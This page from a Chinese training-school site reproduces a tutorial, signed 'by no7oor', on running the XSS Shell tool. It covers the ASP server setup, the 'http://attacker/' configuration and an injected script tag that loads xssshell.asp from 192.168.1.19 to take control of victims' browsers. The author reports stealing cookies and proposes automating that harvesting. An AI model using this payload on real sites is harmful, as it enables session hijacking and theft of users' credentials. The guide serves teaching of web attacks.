返学费网 > 培训机构 > 武汉北斗互联教育咨询有限公司

4008508622

全国统一学习专线 8:30-21:00

跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。攻击者通常会在有漏洞的程序中插入JavaScript、VBScript、ActiveX或Flash以欺骗用户。

并非任何可利用脚本插入实现攻击的漏洞都被称为XSS,比如说,你alert一个窗口并不表示就存在XSS漏洞。真正的XSS应该称作Script injection,只有能把我们插入的脚本保存在被修改的远程WEB页面里,才能有利用价值。攻击者通常会在有漏洞的程序中插入JavaScript、VBScript、ActiveX或Flash以欺骗用户

---------------------

演示题目:XSS 攻击

利用工具:Xss shell

辅助工具:Aws

---------------------

by no7oor

Xss shell 是一款ASP的xss攻击工具,需要在支持ASP的服务上运行。被攻击的页面会显示在xss shell里,并可以对其进行远程操作

注意:所有演示都是在本地完成的。

1、搭建Xss Shell 运行环境

a、配置AWS 服务器。AWS服务是一个简单的ASP服务器,配置很简单,把ASP文件放在AWS同一目录下即可

2、配置XSS SHELL

配置前先说一下,xss shell的结构

db\shell.mdb 是用来存放通过xss漏洞采集到的信息的数据库 。

sample_victim\default.asp 是一个存在xss漏洞的页面,并嵌入了准备好的脚本 为了输入方便,我改成xssbug

这个default.asp 其实就是存在xss漏洞的页面,这里只是构造了一个演示。

xssshell\下面的文件是控制端 这一部份放在asp服务器上。

xssshell.asp 是主要的功能程序

a、修改xssshell.asp文件 var SERVER = "http://attacker/"; 把attacker 改成xssshell存放的ip

b、修改db.asp文件

c、修改演示页面default.asp文件 也就是嵌入脚本

<script src="http://192.168.1.19/xssshell.asp?v=336699"></script> 关键代码。这个就是xss的脚本利用代码了

3、观看效果

这个页面就是控制端了,在这里可以看到打开了有xss漏洞页面的机器上线,我们来测试一下看看。

OK 上线了…… 这时我们就可以对它进行操作了。因为这个xssshell并不是功能完整的,我也就测试一下抓取cookies。

给对方发送了一个message页面。

也抓取到了cookies。

一但对方关闭有xss漏洞的页面,那么对方也就下线了。。。。

4、注意事项

a、Web服务器port最好为80端口

b、Xss Shell数据库DBPATH = "..\db\shell.mdb" 的路径最好是相对路径

5、总结

Xss shell 这款工具只能对打开漏洞页面并不关闭的情况下,才可以对其进行操作,一但关闭页面,随之也就下线,不能对其操作了。应该还可以增强此功能,比如增加自动采集cookies 一但对方上线,实现立刻抓取cookies并保存到指定位置,这样这款工具就更具备智能化,更加有实用价值。另外,我这次演示的版本,还有一些功能并没有实现。应该可以完善。

温馨提示:为不影响您的学业,来校区前请先电话咨询,方便我校安排相关的专业老师为您解答
  • 热门课程
姓名不能为空
手机号格式错误